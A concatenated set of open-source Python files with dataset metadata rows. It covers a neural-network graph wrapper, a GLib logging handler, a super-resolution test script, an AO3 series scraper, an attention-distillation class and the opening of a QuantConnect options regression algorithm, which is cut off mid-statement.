                ops.append(OpWrapper(op, self))
        return ops

    def vars(self):
        """
        Get all the variables.
        """
        return [VarWrapper(var, self) for var in self.program.list_vars()]

    def var(self, name):
        """
        Get the variable by variable name.
        """
        return VarWrapper(self.program.global_block().var(name), self)

    def clone(self, for_test=False):
        """
        Clone a new graph from current graph.
        Returns:
            (GraphWrapper): The wrapper of a new graph.
        """
        return GraphWrapper(
            self.program.clone(for_test),
            copy.deepcopy(self.in_nodes), copy.deepcopy(self.out_nodes))

    def merge(self, graph):
        """
        Merge a graph into current graph.
        Args:
            graph(GraphWrapper): The graph to be merged by current graph.
        """
        # Copy the other graph's persistable variables in, remembering them
        # as "teacher" variables so save_persistables can skip them later.
        for var in graph.program.list_vars():
            if var.persistable:
                self.teacher_persistables[var.name] = var
            new_var = self.program.global_block()._clone_variable(
                var, force_persistable=False)
            new_var.stop_gradient = var.stop_gradient
            # TODO: parameters should be cloned
        # Re-create every operator of the merged graph against this program's
        # variables.
        for op in graph.ops():
            op = op._op
            inputs = {}
            outputs = {}
            attrs = {}
            for input_name in op.input_names:
                inputs[input_name] = [
                    self.var(in_var_name)._var
                    for in_var_name in op.input(input_name)
                ]
            for output_name in op.output_names:
                outputs[output_name] = [
                    self.var(out_var_name)._var
                    for out_var_name in op.output(output_name)
                ]
            for attr_name in op.attr_names:
                attrs[attr_name] = op.attr(attr_name)
            self.program.global_block().append_op(
                type=op.type, inputs=inputs, outputs=outputs, attrs=attrs)

    def program(self):
        """
        Get the program in current wrapper.
        """
        # NOTE(review): this method is shadowed by the instance attribute
        # ``self.program`` assigned in __init__, so it is unreachable on
        # instances (``graph.program`` already yields the Program object);
        # calling it would also return the attribute, not invoke recursion.
        return self.program

    def pre_ops(self, op):
        """
        Get all the previous operators of target operator.
        Args:
            op(OpWrapper): Target operator..
        Returns:
            list<OpWrapper>: A list of operators.
        """
        ops = []
        for p in self.ops():
            for in_var in op.all_inputs():
                if in_var in p.all_outputs():
                    ops.append(p)
        return ops

    def next_ops(self, op):
        """
        Get all the next operators of target operator.
        Args:
            op(OpWrapper): Target operator..
        Returns:
            list<OpWrapper>: A list of operators.
        """
        ops = []
        for p in self.ops():
            for out_var in op.all_outputs():
                if out_var in p.all_inputs():
                    ops.append(p)
        return ops

    def get_param_by_op(self, op):
        """
        Get the parameters used by target operator.
        """
        assert isinstance(op, OpWrapper)
        params = []
        for var in op.all_inputs():
            if isinstance(var._var, Parameter):
                params.append(var)
        assert len(params) > 0
        return params

    def numel_params(self):
        """
        Get the number of elements in all parameters.
        """
        ret = 0
        for param in self.all_parameters():
            ret += np.product(param.shape())
        return ret

    def get_optimize_graph(self, optimizer, place, scope, no_grad_var_names=[]):
        """
        Get a new graph for training by appending some backward operators and optimization operators.
        Args:
            optimizer: The optimizer used to generate training graph.
            place: The place to run the graph.
            scope: The scope used to run the graph. Some new variable will be added into this scope.
            no_grad_var_names(list<str>): Names of variables that should be ignored while computing gradients. default: [].
        Returns:
            (GraphWrapper): The wrapper of new graph with backward ops and optimization ops.
        """
        graph = self.clone()
        startup_program = Program()
        with program_guard(
                main_program=graph.program, startup_program=startup_program):
            target_name = None
            if 'loss' in graph.out_nodes:
                target_name = graph.out_nodes['loss']
            elif 'cost' in graph.out_nodes:
                target_name = graph.out_nodes['cost']
            else:
                # Neither a 'loss' nor a 'cost' output: cannot build a
                # training graph.
                return None
            target = graph.var(target_name)._var
            # The learning rate variable may be created in other program.
            # Update information in optimizer to make
            # learning rate variable being accessible in current program.
            if isinstance(optimizer._learning_rate, Variable):
                optimizer._learning_rate_map[
                    graph.program] = optimizer._learning_rate
            optimizer.minimize(target, no_grad_set=no_grad_var_names)

        exe = Executor(place)
        exe.run(program=startup_program, scope=scope)
        return graph

    def flops(self, only_conv=False):
        """
        Get the flops of current graph.
        Args:
            only_conv: Only calculating the conv layers. default: False.
        Returns:
            int: The flops of current graph.
        """
        flops = 0
        for op in self.ops():
            if op.type() in ['conv2d', 'depthwise_conv2d']:
                filter_shape = op.inputs("Filter")[0].shape()
                input_shape = op.inputs("Input")[0].shape()
                output_shape = op.outputs("Output")[0].shape()
                c_out, c_in, k_h, k_w = filter_shape
                _, _, h_out, w_out = output_shape
                groups = op.attr("groups")
                # MACs per output element: kernel area times input channels
                # per group.
                kernel_ops = k_h * k_w * (c_in / groups)
                if len(op.inputs("Bias")) > 0:
                    with_bias = 1
                else:
                    with_bias = 0
                flops += 2 * h_out * w_out * c_out * (kernel_ops + with_bias)
            elif op.type() == 'pool2d' and not only_conv:
                input_shape = op.inputs("X")[0].shape()
                output_shape = op.outputs("Out")[0].shape()
                _, c_out, h_out, w_out = output_shape
                k_size = op.attr("ksize")
                flops += h_out * w_out * c_out * (k_size[0]**2)
            elif op.type() == 'mul' and not only_conv:
                x_shape = list(op.inputs("X")[0].shape())
                y_shape = op.inputs("Y")[0].shape()
                # -1 marks a dynamic batch dimension; count one sample.
                if x_shape[0] == -1:
                    x_shape[0] = 1
                flops += 2 * x_shape[0] * x_shape[1] * y_shape[1]
            elif op.type() in ['relu', 'sigmoid', 'batch_norm'
                               ] and not only_conv:
                input_shape = list(op.inputs("X")[0].shape())
                if input_shape[0] == -1:
                    input_shape[0] = 1
                flops += np.product(input_shape)
        return flops

    def save_model(self, path, exe):
        """
        Save network and parameters into file which can be load by load_inference_model api.
        Args:
            path(str): The path to save the persistables.
            exe(framework.Executor): The executor used to save the persistables.
        """
        out_vars = [
            self.var(var_name)._var for var_name in self.out_nodes.values()
        ]
        in_vars = list(self.in_nodes.values())
        assert (len(in_vars) > 0)
        assert (len(out_vars) > 0)
        io.save_inference_model(
            path,
            in_vars,
            out_vars,
            exe.exe,
            model_filename="__model__",
            params_filename="__params__",
            main_program=self.program.clone(),
            export_for_deployment=True)

    def save_infer_model(self, path, exe, in_out, program_only=False):
        """
        Save network and parameters into file which can be load by load_inference_model api.
        Args:
            path(str): The path to save the persistables.
            exe(framework.Executor): The executor used to save the persistables.
            in_out(tuple|list): in_out[0] is a list of input nodes' names
                and in_out[1] is a list of output nodes' names.
            program_only(bool): Whether to save program only.
        """
        out_vars = [self.var(var_name)._var for var_name in in_out[1]]
        in_vars = list(in_out[0])
        assert (len(in_vars) > 0)
        assert (len(out_vars) > 0)
        io.save_inference_model(
            path,
            in_vars,
            out_vars,
            exe.exe,
            model_filename="__model__.infer",
            params_filename="__params__",
            program_only=program_only,
            main_program=self.program.clone(),
            export_for_deployment=True)

    def save_persistables(self, path, exe):
        """
        Save all the persistable variables into file.
        Args:
            path(str): The path to save the persistables.
            exe(framework.Executor): The executor used to save the persistables.
        """
        # update persistables from program
        for var in self.program.list_vars():
            if var.persistable and var.name not in self.persistables:
                self.persistables[var.name] = var
        persistables = []
        # Skip reader/double-buffer state and teacher variables merged in via
        # merge(): only the student's own persistables are saved.
        for var in self.persistables:
            if 'reader' not in var and 'double_buffer' not in var and var not in self.teacher_persistables:
                persistables.append(self.persistables[var])

        io.save_vars(exe.exe, path, vars=persistables)

    def load_persistables(self, path, exe):
        """
        Load the persistable variables from file.
        Args:
            path(str): The path to load the persistables.
            exe(framework.Executor): The executor used to load the persistables.
        """

        def if_exist(var):
            # Only load variables that actually have a file on disk.
            return os.path.exists(os.path.join(path, var.name))

        persistables = []
        for var in self.persistables:
            if 'reader' not in var and 'double_buffer' not in var:
                persistables.append(self.persistables[var])
        io.load_vars(exe.exe, path, vars=persistables, predicate=if_exist)

    def update_param_shape(self, scope):
        """
        Update the shape of parameters in the graph according to tensors in scope.
        It is used after loading pruned parameters from file.
        """
        for param in self.all_parameters():
            tensor_shape = np.array(scope.find_var(param.name()).get_tensor(
            )).shape
            param.set_shape(tensor_shape)

    def infer_shape(self):
        """
        Re-run shape inference for every operator in the graph.
        It is used after loading pruned parameters from file.
        """
        for op in self.ops():
            if op.type() != 'conditional_block':
                op._op.desc.infer_shape(op._op.block.desc)

    def update_groups_of_conv(self):
        """
        Update the 'groups' attribute of depthwise convolutions to match the
        (possibly pruned) filter's output-channel count.
        """
        for op in self.ops():
            if op.type() == 'depthwise_conv2d' or op.type(
            ) == 'depthwise_conv2d_grad':
                op.set_attr('groups', op.inputs('Filter')[0].shape()[0])
| 33.893836
| 123
| 0.566535
|
4a0e9050abe9ad6bb92a44d0cb025ee7289a679e
| 1,042
|
py
|
Python
|
cobang/logging.py
|
php1301/CoBang
|
b1c7f1fb72233c58dca5b10084939a528c4cb61c
|
[
"Apache-2.0"
] | 1
|
2020-05-29T10:14:41.000Z
|
2020-05-29T10:14:41.000Z
|
cobang/logging.py
|
php1301/CoBang
|
b1c7f1fb72233c58dca5b10084939a528c4cb61c
|
[
"Apache-2.0"
] | null | null | null |
cobang/logging.py
|
php1301/CoBang
|
b1c7f1fb72233c58dca5b10084939a528c4cb61c
|
[
"Apache-2.0"
] | null | null | null |
import gi
import logbook
from logbook.handlers import Handler, StringFormatterHandlerMixin
gi.require_version('GLib', '2.0')
from gi.repository import GLib
from .consts import SHORT_NAME
# Mapping from logbook severity levels to GLib structured-log level flags.
LOGBOOK_LEVEL_TO_GLIB = {
    logbook.DEBUG: GLib.LogLevelFlags.LEVEL_DEBUG,
    logbook.INFO: GLib.LogLevelFlags.LEVEL_INFO,
    logbook.WARNING: GLib.LogLevelFlags.LEVEL_WARNING,
    # For Error level, we translate to GLib Critical, instead of Error, because the later causes crash
    logbook.ERROR: GLib.LogLevelFlags.LEVEL_CRITICAL,
}
def _log(level: GLib.LogLevelFlags, message: str):
    """Emit *message* to GLib's structured log under this app's domain."""
    fields = GLib.Variant('a{sv}', {
        'MESSAGE': GLib.Variant('s', message),
    })
    GLib.log_variant(SHORT_NAME, level, fields)
# Logbook custom handler to redirect message to GLib log
class GLibLogHandler(Handler, StringFormatterHandlerMixin):
    """Logbook handler that forwards formatted records to the GLib log."""

    def emit(self, record):
        formatted = self.format(record)
        glib_level = LOGBOOK_LEVEL_TO_GLIB[record.level]
        _log(glib_level, formatted)
| 28.162162
| 102
| 0.742802
|
4a0e91274f286a29dfd4ab19a5fe02704bc41a19
| 5,226
|
py
|
Python
|
test_image.py
|
tian961214/RFB_ESRGAN-PyTorch
|
0104e8e9b172065e94ac07bf65d9bb9a1898425e
|
[
"Apache-2.0"
] | 1
|
2021-05-27T06:41:43.000Z
|
2021-05-27T06:41:43.000Z
|
test_image.py
|
tian961214/RFB_ESRGAN-PyTorch
|
0104e8e9b172065e94ac07bf65d9bb9a1898425e
|
[
"Apache-2.0"
] | null | null | null |
test_image.py
|
tian961214/RFB_ESRGAN-PyTorch
|
0104e8e9b172065e94ac07bf65d9bb9a1898425e
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Dakewe Biotech Corporation. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import argparse
import logging
import os
import random
import torch
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
import torchvision.transforms as transforms
import torchvision.utils as vutils
from PIL import Image
from torchvision.transforms import InterpolationMode
import rfb_esrgan_pytorch.models as models
from rfb_esrgan_pytorch.utils.common import configure
from rfb_esrgan_pytorch.utils.common import create_folder
from rfb_esrgan_pytorch.utils.estimate import iqa
from rfb_esrgan_pytorch.utils.transform import process_image
# Every lowercase, non-dunder callable exported by `models` is a selectable
# architecture name (mirrors the torchvision convention).
model_names = sorted(name for name in models.__dict__ if name.islower() and not name.startswith("__") and callable(models.__dict__[name]))
logger = logging.getLogger(__name__)
logging.basicConfig(format="[ %(levelname)s ] %(message)s", level=logging.INFO)
# Command-line interface for single-image super-resolution evaluation.
parser = argparse.ArgumentParser(description="Perceptual Extreme Super Resolution Network with Receptive Field Block.")
parser.add_argument("--lr", type=str, required=True,
                    help="Test low resolution image name.")
parser.add_argument("--hr", type=str,
                    help="Raw high resolution image name.")
parser.add_argument("-a", "--arch", metavar="ARCH", default="rfb",
                    choices=model_names,
                    help="Model architecture: " +
                         " | ".join(model_names) +
                         ". (Default: `rfb`)")
parser.add_argument("--upscale-factor", type=int, default=16, choices=[4, 16],
                    help="Low to high resolution scaling factor. Optional: [4, 16]. (Default: 16)")
parser.add_argument("--model-path", default="", type=str, metavar="PATH",
                    help="Path to latest checkpoint for model. (Default: ``)")
parser.add_argument("--pretrained", dest="pretrained", action="store_true",
                    help="Use pre-trained model.")
parser.add_argument("--seed", default=666, type=int,
                    help="Seed for initializing training. (Default: 666)")
parser.add_argument("--gpu", default=None, type=int,
                    help="GPU id to use.")
def main():
    """Entry point: parse CLI arguments, fix all RNG seeds, run the worker."""
    cli_args = parser.parse_args()
    cudnn.deterministic = True
    # Seed both Python's and PyTorch's RNGs so repeated runs are reproducible.
    seed = cli_args.seed
    random.seed(seed)
    torch.manual_seed(seed)
    main_worker(cli_args.gpu, cli_args)
def main_worker(gpu, args):
    """Run single-image super-resolution and write result images to ``tests/``.

    Args:
        gpu (int or None): CUDA device id to use; ``None`` selects the default
            device / CPU.
        args (argparse.Namespace): Parsed CLI options (``lr``, ``hr``,
            ``upscale_factor``, model selection options, ``seed``, ...).
    """
    args.gpu = gpu
    if args.gpu is not None:
        logger.info(f"Use GPU: {args.gpu} for testing.")
    model = configure(args)
    if not torch.cuda.is_available():
        logger.warning("Using CPU, this will be slow.")
    if args.gpu is not None:
        torch.cuda.set_device(args.gpu)
        model = model.cuda(args.gpu)
    # Inference only: freeze dropout/batch-norm and let cuDNN autotune kernels.
    model.eval()
    cudnn.benchmark = True
    # Basename of the input image, used to name every output file.
    # BUG FIX: `filename` was computed but never used - all outputs were saved
    # under a fixed literal placeholder name, so multiple runs overwrote each
    # other. The output paths below now embed the input filename.
    filename = os.path.basename(args.lr)
    # Read the input and build a bicubic upscale for visual comparison.
    lr = Image.open(args.lr)
    bicubic = transforms.Resize((lr.size[1] * args.upscale_factor, lr.size[0] * args.upscale_factor), InterpolationMode.BICUBIC)(lr)
    lr = process_image(lr, args.gpu)
    bicubic = process_image(bicubic, args.gpu)
    with torch.no_grad():
        sr = model(lr)
    if args.hr:
        # Ground truth available: save it, add it to the comparison strip and
        # compute full-reference image-quality metrics.
        hr = process_image(Image.open(args.hr), args.gpu)
        vutils.save_image(hr, os.path.join("tests", f"hr_{filename}"))
        images = torch.cat([bicubic, sr, hr], dim=-1)
        value = iqa(sr, hr, args.gpu)
        print(f"Performance avg results:\n")
        print(f"indicator Score\n")
        print(f"--------- -----\n")
        print(f"MSE {value[0]:6.4f}\n"
              f"RMSE {value[1]:6.4f}\n"
              f"PSNR {value[2]:6.2f}\n"
              f"SSIM {value[3]:6.4f}\n"
              f"LPIPS {value[4]:6.4f}\n"
              f"GMSD {value[5]:6.4f}\n")
    else:
        images = torch.cat([bicubic, sr], dim=-1)
    vutils.save_image(lr, os.path.join("tests", f"lr_{filename}"))
    vutils.save_image(bicubic, os.path.join("tests", f"bicubic_{filename}"))
    vutils.save_image(sr, os.path.join("tests", f"sr_{filename}"))
    vutils.save_image(images, os.path.join("tests", f"compare_{filename}"), padding=10)
# Script entry point: prepare the output folder, print banner info and run.
if __name__ == "__main__":
    print("##################################################\n")
    print("Run Testing Engine.\n")
    create_folder("tests")
    logger.info("TestingEngine:")
    print("\tAPI version .......... 0.2.0")
    print("\tBuild ................ 2021.04.15")
    print("##################################################\n")
    main()
    logger.info("Test single image performance evaluation completed successfully.\n")
| 37.597122
| 138
| 0.628396
|
4a0e916f8c42b9aa380c98113c51696165544c4a
| 9,990
|
py
|
Python
|
AO3/series.py
|
gf0507033/ao3_api
|
675efd41c66812265bb6cfe4bfc6dde8c1db5bd2
|
[
"MIT"
] | null | null | null |
AO3/series.py
|
gf0507033/ao3_api
|
675efd41c66812265bb6cfe4bfc6dde8c1db5bd2
|
[
"MIT"
] | null | null | null |
AO3/series.py
|
gf0507033/ao3_api
|
675efd41c66812265bb6cfe4bfc6dde8c1db5bd2
|
[
"MIT"
] | null | null | null |
from datetime import date
from cached_property import cached_property
from bs4 import BeautifulSoup
from . import threadable, utils
from .requester import requester
from .users import User
from .works import Work
class Series:
    """An AO3 series page; metadata is scraped lazily via cached properties."""
    def __init__(self, seriesid, session=None, load=True):
        """Creates a new series object
        Args:
            seriesid (int/str): ID of the series
            session (AO3.Session, optional): Session object. Defaults to None.
            load (bool, optional): If true, the work is loaded on initialization. Defaults to True.
        Raises:
            utils.InvalidIdError: Invalid series ID
        """
        self.seriesid = seriesid
        self._session = session
        self._soup = None  # BeautifulSoup of the series page; set by reload()
        if load:
            self.reload()
    def __eq__(self, other):
        # Two Series objects are equal iff they wrap the same series ID.
        return isinstance(other, Series) and other.seriesid == self.seriesid
    def __repr__(self):
        # NOTE(review): the bare except is a deliberate fallback - self.name
        # raises before the page is loaded; consider narrowing to Exception.
        try:
            return f"<Series [{self.name}]>"
        except:
            return f"<Series [{self.seriesid}]>"
    def __getstate__(self):
        """Make the object picklable: BeautifulSoup values are stored encoded."""
        d = {}
        for attr in self.__dict__:
            if isinstance(self.__dict__[attr], BeautifulSoup):
                # (value, True) marks entries that must be re-parsed on load.
                d[attr] = (self.__dict__[attr].encode(), True)
            else:
                d[attr] = (self.__dict__[attr], False)
        return d
    def __setstate__(self, d):
        """Restore pickled state, re-parsing encoded BeautifulSoup entries."""
        for attr in d:
            value, issoup = d[attr]
            if issoup:
                self.__dict__[attr] = BeautifulSoup(value, "lxml")
            else:
                self.__dict__[attr] = value
    @threadable.threadable
    def reload(self):
        """
        Loads information about this series.
        This function is threadable.
        """
        # Drop every cached_property value so it is recomputed from fresh HTML.
        for attr in self.__class__.__dict__:
            if isinstance(getattr(self.__class__, attr), cached_property):
                if attr in self.__dict__:
                    delattr(self, attr)
        self._soup = self.request(f"https://archiveofourown.org/series/{self.seriesid}")
        if "Error 404" in self._soup.text:
            raise utils.InvalidIdError("Cannot find series")
    @threadable.threadable
    def subscribe(self):
        """Subscribes to this series.
        This function is threadable.
        Raises:
            utils.AuthError: Invalid session
        """
        if self._session is None or not self._session.is_authed:
            raise utils.AuthError("You can only subscribe to a series using an authenticated session")
        utils.subscribe(self.seriesid, "Series", self._session)
    @threadable.threadable
    def unsubscribe(self):
        """Unubscribes from this series.
        This function is threadable.
        Raises:
            utils.AuthError: Invalid session
        """
        if not self.is_subscribed:
            raise Exception("You are not subscribed to this series")
        if self._session is None or not self._session.is_authed:
            raise utils.AuthError("You can only unsubscribe from a series using an authenticated session")
        utils.subscribe(self.seriesid, "Series", self._session, True, self._sub_id)
    @cached_property
    def is_subscribed(self):
        """True if you're subscribed to this series"""
        if self._session is None or not self._session.is_authed:
            raise utils.AuthError("You can only get a series ID using an authenticated session")
        # The subscribe form shows an "Unsubscribe" button only when subscribed.
        form = self._soup.find("form", {"data-create-value": "Subscribe"})
        input_ = form.find("input", {"name": "commit", "value": "Unsubscribe"})
        return input_ is not None
    @cached_property
    def _sub_id(self):
        """Returns the subscription ID. Used for unsubscribing"""
        if not self.is_subscribed:
            raise Exception("You are not subscribed to this series")
        # The subscription id is the last path segment of the form action URL.
        form = self._soup.find("form", {"data-create-value": "Subscribe"})
        id_ = form.attrs["action"].split("/")[-1]
        return int(id_)
    @cached_property
    def name(self):
        """Name of this series (whitespace-normalised)."""
        div = self._soup.find("div", {"class": "series-show region"})
        return div.h2.getText().replace("\t", "").replace("\n", "")
    @cached_property
    def creators(self):
        """Creators of this series, as unloaded User objects."""
        dl = self._soup.find("dl", {"class": "series meta group"})
        return [User(author.getText(), load=False) for author in dl.findAll("a", {"rel": "author"})]
    @cached_property
    def series_begun(self):
        """Date the series began, parsed from the "Series Begun:" field."""
        dl = self._soup.find("dl", {"class": "series meta group"})
        info = dl.findAll(("dd", "dt"))
        # Walk <dt>/<dd> pairs: remember the last label, read its value.
        last_dt = None
        for field in info:
            if field.name == "dt":
                last_dt = field.getText().strip()
            elif last_dt == "Series Begun:":
                date_str = field.getText().strip()
                break
        # NOTE(review): if the label is never found, date_str is unbound and
        # this raises NameError - confirm whether that can occur on real pages.
        return date(*list(map(int, date_str.split("-"))))
    @cached_property
    def series_updated(self):
        """Date the series was last updated ("Series Updated:" field)."""
        dl = self._soup.find("dl", {"class": "series meta group"})
        info = dl.findAll(("dd", "dt"))
        last_dt = None
        for field in info:
            if field.name == "dt":
                last_dt = field.getText().strip()
            elif last_dt == "Series Updated:":
                date_str = field.getText().strip()
                break
        return date(*list(map(int, date_str.split("-"))))
    @cached_property
    def words(self):
        """Total word count of the series ("Words:" stat)."""
        dl = self._soup.find("dl", {"class": "series meta group"})
        stats = dl.find("dl", {"class": "stats"}).findAll(("dd", "dt"))
        last_dt = None
        for field in stats:
            if field.name == "dt":
                last_dt = field.getText().strip()
            elif last_dt == "Words:":
                words = field.getText().strip()
                break
        # Strip thousands separators before converting.
        return int(words.replace(",", ""))
    @cached_property
    def nworks(self):
        """Number of works in the series ("Works:" stat)."""
        dl = self._soup.find("dl", {"class": "series meta group"})
        stats = dl.find("dl", {"class": "stats"}).findAll(("dd", "dt"))
        last_dt = None
        for field in stats:
            if field.name == "dt":
                last_dt = field.getText().strip()
            elif last_dt == "Works:":
                works = field.getText().strip()
                break
        return int(works.replace(",", ""))
    @cached_property
    def complete(self):
        """True if the series is marked complete ("Complete:" stat)."""
        dl = self._soup.find("dl", {"class": "series meta group"})
        stats = dl.find("dl", {"class": "stats"}).findAll(("dd", "dt"))
        last_dt = None
        for field in stats:
            if field.name == "dt":
                last_dt = field.getText().strip()
            elif last_dt == "Complete:":
                complete = field.getText().strip()
                break
        return True if complete == "Yes" else False
    @cached_property
    def description(self):
        """Series description text; empty string when absent."""
        dl = self._soup.find("dl", {"class": "series meta group"})
        info = dl.findAll(("dd", "dt"))
        last_dt = None
        desc = ""
        for field in info:
            if field.name == "dt":
                last_dt = field.getText().strip()
            elif last_dt == "Description:":
                desc = field.getText().strip()
                break
        return desc
    @cached_property
    def notes(self):
        """Series notes text; empty string when absent."""
        dl = self._soup.find("dl", {"class": "series meta group"})
        info = dl.findAll(("dd", "dt"))
        last_dt = None
        notes = ""
        for field in info:
            if field.name == "dt":
                last_dt = field.getText().strip()
            elif last_dt == "Notes:":
                notes = field.getText().strip()
                break
        return notes
    @cached_property
    def nbookmarks(self):
        """Number of bookmarks on the series ("Bookmarks:" stat)."""
        dl = self._soup.find("dl", {"class": "series meta group"})
        stats = dl.find("dl", {"class": "stats"}).findAll(("dd", "dt"))
        last_dt = None
        for field in stats:
            if field.name == "dt":
                last_dt = field.getText().strip()
            elif last_dt == "Bookmarks:":
                book = field.getText().strip()
                break
        return int(book.replace(",", ""))
    @cached_property
    def work_list(self):
        """Works in the series, as unloaded Work objects with title/authors set."""
        ul = self._soup.find("ul", {"class": "series work index group"})
        works = []
        for work in ul.find_all("li", {'class': 'work blurb group'}):
            authors = []
            # Blurbs without an <h4> heading are not works; skip them.
            if work.h4 is None:
                continue
            for a in work.h4.find_all("a"):
                if 'rel' in a.attrs.keys():
                    if "author" in a['rel']:
                        authors.append(User(a.string, load=False))
                elif a.attrs["href"].startswith("/works"):
                    # The work link itself carries the title and the work id.
                    workname = a.string
                    workid = utils.workid_from_url(a['href'])
            new = Work(workid, load=False)
            setattr(new, "title", workname)
            setattr(new, "authors", authors)
            works.append(new)
        return works
    def get(self, *args, **kwargs):
        """Request a web page and return a Response object"""
        # Use the authenticated session when one is available.
        if self._session is None:
            req = requester.request("get", *args, **kwargs)
        else:
            req = requester.request("get", *args, **kwargs, session=self._session.session)
        if req.status_code == 429:
            raise utils.HTTPError("We are being rate-limited. Try again in a while or reduce the number of requests")
        return req
    def request(self, url):
        """Request a web page and return a BeautifulSoup object.
        Args:
            url (str): Url to request
        Returns:
            bs4.BeautifulSoup: BeautifulSoup object representing the requested page's html
        """
        req = self.get(url)
        soup = BeautifulSoup(req.content, "lxml")
        return soup
| 34.93007
| 117
| 0.536537
|
4a0e917a04c793844b63ee797ce514f689386ae6
| 2,572
|
py
|
Python
|
KD_Lib/KD/vision/attention/attention.py
|
PiaCuk/KD_Lib
|
153299d484e4c6b33793749709dbb0f33419f190
|
[
"MIT"
] | 360
|
2020-05-11T08:18:20.000Z
|
2022-03-31T01:48:43.000Z
|
KD_Lib/KD/vision/attention/attention.py
|
PiaCuk/KD_Lib
|
153299d484e4c6b33793749709dbb0f33419f190
|
[
"MIT"
] | 91
|
2020-05-11T08:14:56.000Z
|
2022-03-30T05:29:03.000Z
|
KD_Lib/KD/vision/attention/attention.py
|
PiaCuk/KD_Lib
|
153299d484e4c6b33793749709dbb0f33419f190
|
[
"MIT"
] | 39
|
2020-05-11T08:06:47.000Z
|
2022-03-29T05:11:18.000Z
|
import torch.nn.functional as F
from KD_Lib.KD.common import BaseClass
from .loss_metric import ATLoss
class Attention(BaseClass):
    """
    Implementation of attention-based Knowledge distillation from the paper "Paying More
    Attention To The Attention - Improving the Performance of CNNs via Attention Transfer"
    https://arxiv.org/pdf/1612.03928.pdf
    The distillation loss is fixed to ATLoss and is not a constructor argument.
    :param teacher_model (torch.nn.Module): Teacher model
    :param student_model (torch.nn.Module): Student model
    :param train_loader (torch.utils.data.DataLoader): Dataloader for training
    :param val_loader (torch.utils.data.DataLoader): Dataloader for validation/testing
    :param optimizer_teacher (torch.optim.*): Optimizer used for training teacher
    :param optimizer_student (torch.optim.*): Optimizer used for training student
    :param temp (float): Temperature parameter for distillation
    :param distil_weight (float): Weight parameter for distillation loss
    :param device (str): Device used for training; 'cpu' for cpu and 'cuda' for gpu
    :param log (bool): True if logging required
    :param logdir (str): Directory for storing logs
    """
    def __init__(
        self,
        teacher_model,
        student_model,
        train_loader,
        val_loader,
        optimizer_teacher,
        optimizer_student,
        temp=20.0,
        distil_weight=0.5,
        device="cpu",
        log=False,
        logdir="./Experiments",
    ):
        # Delegate all bookkeeping to BaseClass; the loss is hard-wired to
        # ATLoss (attention-transfer loss) for this distillation method.
        super(Attention, self).__init__(
            teacher_model,
            student_model,
            train_loader,
            val_loader,
            optimizer_teacher,
            optimizer_student,
            ATLoss(),
            temp,
            distil_weight,
            device,
            log,
            logdir,
        )
        # Move the loss module to the same device as the models.
        self.loss_fn = self.loss_fn.to(self.device)
    def calculate_kd_loss(self, y_pred_student, y_pred_teacher, y_true):
        """
        Function used for calculating the KD loss during distillation
        :param y_pred_student (torch.FloatTensor): Prediction made by the student model
        :param y_pred_teacher (torch.FloatTensor): Prediction made by the teacher model
        :param y_true (torch.FloatTensor): Original label
        """
        # Supervised cross-entropy on the student's logits (element [0] of the
        # student output), softened by `temp` and weighted by (1 - distil_weight).
        loss = (
            (1.0 - self.distil_weight)
            * self.temp
            * F.cross_entropy(y_pred_student[0] / self.temp, y_true)
        )
        # Attention-transfer term between teacher and student feature maps.
        loss += self.distil_weight * self.loss_fn(y_pred_teacher, y_pred_student)
        return loss
| 35.232877
| 90
| 0.650855
|
4a0e922a7e7c541445b87ed9862fe3ab7a8d2b97
| 4,067
|
py
|
Python
|
Algorithm.Python/FutureOptionBuySellCallIntradayRegressionAlgorithm.py
|
szymanskilukasz/Lean
|
fe2ac131af2d0614494e5c970a57d4b7c89d5f88
|
[
"Apache-2.0"
] | 3
|
2021-02-18T08:06:35.000Z
|
2021-02-23T17:12:47.000Z
|
Algorithm.Python/FutureOptionBuySellCallIntradayRegressionAlgorithm.py
|
szymanskilukasz/Lean
|
fe2ac131af2d0614494e5c970a57d4b7c89d5f88
|
[
"Apache-2.0"
] | 1
|
2021-02-22T21:03:27.000Z
|
2021-02-23T19:01:04.000Z
|
Algorithm.Python/FutureOptionBuySellCallIntradayRegressionAlgorithm.py
|
szymanskilukasz/Lean
|
fe2ac131af2d0614494e5c970a57d4b7c89d5f88
|
[
"Apache-2.0"
] | 1
|
2021-03-12T05:22:15.000Z
|
2021-03-12T05:22:15.000Z
|
# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.
# Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
from datetime import datetime, timedelta
import clr
from System import *
from System.Reflection import *
from QuantConnect import *
from QuantConnect.Algorithm import *
from QuantConnect.Data import *
from QuantConnect.Data.Market import *
from QuantConnect.Orders import *
from QuantConnect.Securities import *
from QuantConnect.Securities.Future import *
from QuantConnect import Market
### <summary>
### This regression algorithm tests In The Money (ITM) future option calls across different strike prices.
### We expect 6 orders from the algorithm, which are:
###
### * (1) Initial entry, buy ES Call Option (ES19M20 expiring ITM)
### * (2) Initial entry, sell ES Call Option at different strike (ES20H20 expiring ITM)
### * [2] Option assignment, opens a position in the underlying (ES20H20, Qty: -1)
### * [2] Future contract liquidation, due to impending expiry
### * [1] Option exercise, receive 1 ES19M20 future contract
### * [1] Liquidate ES19M20 contract, due to expiry
###
### Additionally, we test delistings for future options and assert that our
### portfolio holdings reflect the orders the algorithm has submitted.
### </summary>
class FutureOptionBuySellCallIntradayRegressionAlgorithm(QCAlgorithm):
    def Initialize(self):
        """Set up the backtest window, the two ES future contracts and their
        3200-strike call options, and schedule entry/liquidation callbacks."""
        self.SetStartDate(2020, 1, 5)
        self.SetEndDate(2020, 6, 30)
        # ES e-mini expiring March 2020.
        self.es20h20 = self.AddFutureContract(
